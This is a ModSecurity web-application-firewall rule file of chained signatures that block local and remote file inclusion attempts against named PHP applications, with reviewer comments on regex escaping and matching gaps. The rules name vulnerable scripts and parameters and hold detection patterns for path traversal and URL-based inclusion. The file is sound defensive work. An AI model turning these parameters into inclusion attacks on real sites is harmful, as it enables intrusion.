"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009726,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34617'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:inc_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /cms_detect.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009729,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34634'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003678) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tropicalm Remote Inclusion Attempt -- dosearch.php RESPATH SecRule REQUEST_LINE "@contains /dosearch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003678,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Tropicalm Remote Inclusion Attempt -- dosearch.php RESPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3865'" SecRule &TX:'/RFI.*ARGS:RESPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tropicalm Remote Inclusion Attempt -- dosearch.php RESPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003687) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- payflow_pro.php abs_path SecRule REQUEST_LINE "@contains /include/payment/payflow_pro.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003687,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- payflow_pro.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23662'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- payflow_pro.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003688) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- global.php abs_path SecRule REQUEST_LINE "@contains /global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003688,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- global.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23662'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- global.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003689) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- libsecure.php abs_path SecRule REQUEST_LINE "@contains /libsecure.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003689,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- libsecure.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23662'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- libsecure.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" 
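"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008923,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32498'"
SecRule REQUEST_LINE "@contains GET " "chain"
# NOTE(review): the selector regex is unanchored, so "ARGS:m" also matches TX
# names for any argument whose name starts with "m"; with a path as common as
# /index.php this can attribute unrelated RFI hits to TxtBlog. The message says
# Local File Inclusion, yet this link relies on an RFI-labelled TX entry rather
# than a "../" check like rule 2010127 below - confirm the intent.
SecRule &TX:'/RFI.*ARGS:m/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010126) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /include/timesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010126,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
# The parameter name contains literal brackets. Unescaped, [include_dir] is a
# regex character class (one character from that set), so the original selector
# could not match a TX name ending in ARGS:config[include_dir] and the rule
# stayed silent for the parameter it documents. Each bracket is now matched with
# "." so the selector needs no backslash escapes inside the quoted variable name.
SecRule &TX:'/RFI.*ARGS:config.include_dir./' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion
# The last link of this chain (continued on the next line) selects the argument
# by its literal name rather than by regex, so the brackets are not a character
# class there. It looks for "../" in that argument's value.
SecRule REQUEST_LINE "@contains /include/timesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010127,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:config[include_dir] 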
"@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003692) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VM Watermark Remote Inclusion Attempt -- watermark.php GALLERY_BASEDIR SecRule REQUEST_LINE "@contains /watermark.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003692,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS VM Watermark Remote Inclusion Attempt -- watermark.php GALLERY_BASEDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3857'" SecRule &TX:'/RFI.*ARGS:GALLERY_BASEDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VM Watermark Remote Inclusion Attempt -- watermark.php GALLERY_BASEDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002899) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion get_header.php SecRule REQUEST_LINE "@contains /get_header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002899,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion get_header.php',tag:'web-application-attack',tag:'bugtraq,17358'" SecRule QUERY_STRING|REQUEST_BODY "(?i:vwar_root=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion get_header.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002902) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion functions_install.php SecRule REQUEST_LINE "@contains 
/functions_install.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002902,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion functions_install.php',tag:'web-application-attack',tag:'bugtraq,17290'" SecRule QUERY_STRING|REQUEST_BODY "(?i:vwar_root=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion functions_install.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010254) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ve-EDIT edit_htmlarea.php highlighter Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /editor/edit_htmlarea.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010254,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ve-EDIT edit_htmlarea.php highlighter Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:highlighter/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ve-EDIT edit_htmlarea.php highlighter Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /debugger/debug_php.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010255,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:_GET[filename] "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003671) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Versado CMS Remote Inclusion Attempt -- ajax_listado.php urlModulo SecRule REQUEST_LINE "@contains /includes/ajax_listado.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003671,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Versado CMS Remote Inclusion Attempt -- ajax_listado.php urlModulo',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3847'" SecRule &TX:'/RFI.*ARGS:urlModulo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Versado CMS Remote Inclusion Attempt -- ajax_listado.php urlModulo',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009877) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VirtueMart Google Base Component admin.googlebase.php Remote File Inclusion SecRule REQUEST_LINE "@contains /admin.googlebase.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009877,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS VirtueMart Google Base Component admin.googlebase.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32098'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VirtueMart Google Base Component admin.googlebase.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009838) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News 
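search.php config Parameter Remote File Inclusion

#
# Reviewer notes for the WB News signatures (2009838-2009846) below:
#   - The first SecRule of a signature matches the script path in REQUEST_LINE
#     and starts a chain; the last SecRule of the chain carries the scoring
#     actions (tx.msg, tx.anomaly_score, audit log part E).
#   - A selector of the form &TX:'/RFI.*ARGS:<name>/' counts the TX variables
#     whose key matches that regular expression. Presumably those keys are
#     written by the generic RFI rules of the rule set, which are not shown
#     here - confirm that they run before these signatures.
#   - Because the selector is a regular expression, the brackets of the
#     array-style parameter name are escaped in every WB News rule. Unescaped,
#     [installdir] is read as a character class and the selector cannot match
#     a key that ends in ARGS:config[installdir], which leaves the signatures
#     unable to fire for the parameter they name.
#   - NOTE(review): a chain that includes REQUEST_LINE "@contains GET " only
#     completes when the request line contains that string, so the named
#     parameter is presumably not scored when it arrives with another
#     method - confirm that this is intended.
#

SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009838,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News search.php config Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News search.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009839) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News archive.php config Parameter Remote File Inclusion -1
SecRule REQUEST_LINE "@contains /archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009839,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News archive.php config Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News archive.php config Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009840) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News Archive.php config Parameter Remote File Inclusion -2
SecRule REQUEST_LINE "@contains /base/Archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009840,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News Archive.php config Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News Archive.php config Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009841) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News comments.php config Parameter Remote File Inclusion -1
SecRule REQUEST_LINE "@contains /comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009841,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News comments.php config Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News comments.php config Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News Comments.php config Parameter Remote File Inclusion -2
SecRule REQUEST_LINE "@contains /base/Comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009842,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News Comments.php config Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News Comments.php config Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News news.php config Parameter Remote File Inclusion -1
SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009843,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News news.php config Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News news.php config Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News News.php config Parameter Remote File Inclusion -2
SecRule REQUEST_LINE "@contains /base/News.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009844,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News News.php config Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News News.php config Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News SendFriend.php config Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /base/SendFriend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009845,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News SendFriend.php config Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33434'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News SendFriend.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News global.php config Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /admin/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009846,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News global.php config Parameter Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:config\[installdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News global.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008826) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Way Of The Warrior crea.php plancia Remote File Inclusion
SecRule REQUEST_LINE "@contains crea.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008826,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Way Of The Warrior crea.php plancia Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:plancia/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Way Of The Warrior crea.php plancia Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009306) SpiderLabs Research (SLR) Public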
Vulns: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009306,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009307) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009307,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_browsers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File 
Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /ST_browsers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_countries.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009310,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File 
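Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

#
# Reviewer notes for the signatures in this part of the file:
#   - The first SecRule of a signature matches the script path in REQUEST_LINE
#     and starts a chain; the last SecRule of the chain carries the scoring
#     actions (tx.msg, tx.anomaly_score, audit log part E).
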